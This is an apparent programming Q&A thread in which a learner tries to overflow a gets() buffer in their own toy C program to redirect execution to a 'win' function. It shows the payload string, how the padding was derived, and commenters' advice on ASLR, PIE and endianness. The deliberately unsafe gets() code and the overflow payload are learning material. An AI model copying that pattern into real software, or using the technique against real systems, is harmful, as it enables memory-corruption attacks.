# Redirecting logic flow by exploiting the stack

Tags: assembly, x86-64, buffer-overflow, exploit

I'm trying to modify rip to redirect code flow to a function called 'win'. However many attempts have failed.

Here is the code, disassembly, and system specs:

```
void return_input (void)
{
        char array[30];
        gets (array);
        printf("%s\n", array);
}

void win (void)
{
    printf("Redirected!\n");
}

int main() {
        return_input();
    return 0; 
}

Compiled using: cc -ggdb overflow.c -o Overflow

Dump of assembler code for function main:
   0x0000555555555180 <+0>: push   %rbp
   0x0000555555555181 <+1>: mov    %rsp,%rbp
   0x0000555555555184 <+4>: callq  0x555555555145 <return_input>
   0x0000555555555189 <+9>: mov    $0x0,%eax
   0x000055555555518e <+14>:    pop    %rbp
   0x000055555555518f <+15>:    retq   

location of win: 0x55555555516d <win>:  -443987883

System specs (I am using a kali vm): 
Architecture:        x86_64
CPU op-mode(s):      32-bit, 64-bit
Byte Order:          Little Endian
Address sizes:       39 bits physical, 48 bits virtual
Vendor ID:           GenuineIntel
CPU family:          6
Model:               70
Model name:          Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz
```

With p/d 0x7fffffffe148-0x7fffffffe120 in gdb I found that the padding required is 40.

So I came up with this: `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6d\x51\x55\x55\x55\x55\x00\x00`
Then `printf 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6d\x51\x55\x55\x55\x55\x00\x00' | ./Overflow`

```
printf 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6d\x51\x55\x55\x55\x55\x00\x00' |
  ./TheOver AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmQUUUU
 Segmentation fault
```

I also tried `echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x6d\x51\x55\x55\x55\x55\x00\x00' | ./TheOver`

And didn't work as well so I figured that wasn't the issue...

Edit: Before and after of the stack and info frame: 
[image]

Comment: The stack in `return_input` is the one you’re trying to overwrite, so you need to disassemble that one.

Comment: You may need to worry about stack alignment. When you return to a function that’s supposed to be called, the stack won’t be aligned properly. Printf may or may not care about that.

Comment: @prl the stack is that of return_input so that should be ok, however, very new to this stuff and I don't really know what stack alignment is and more importantly, how to implement it. Thank you!

Comment: Your GCC made a PIE executable by default.  Unless you disabled ASLR globally in `/proc`, the base address of your executable is randomized into a different page every time it runs.  (And thus also the address of `win`).  If you run your program from *inside* GDB, GDB disables ASLR. 
 https://en.wikipedia.org/wiki/Address_space_layout_randomization.  To check you could add `printf("%s\n", win)` to main.  Or better, since you're already using GDB, **try your exploit inside GDB** so you can see how it faults.  `start < file` works.  Not sure about pipes.

Comment: @PeterCordes Thanks for the idea but it doesn't seem to work and I have attached an image to the question showing the before and after of the stack (I put the input in a file as you said and did start < file)

Comment: The saved RIP is a qword, 8 bytes.  You're dumping in 4-byte chunks.  Use `x /10gx $rsp` to see 8 byte qword "stack slots" grouped together as single numbers.  It is true that the saved RIP (return address) and the target are both in the same 4GiB region of virtual address space, so you do only need to overwrite the low 4 bytes, though.  If you highlighted the right dword, it looks like you overwrote it with ASCII text, not an address.

Comment: @PeterCordes How do I overwrite it as an address? Also, I don't really understand what you mean by "you do only need to overwrite the low 4 bytes". Thank you for the speedy response!

Comment: x86 is little endian, and the high 4 bytes of the actual return address and your target address are the same, I think.  Bytes get overwritten (logically) one at a time; it you don't "overwrite bytes as an address", you just make sure that after `gets` returns, the bytes in memory are what you want.  It doesn't matter how you trick `gets` into putting them there.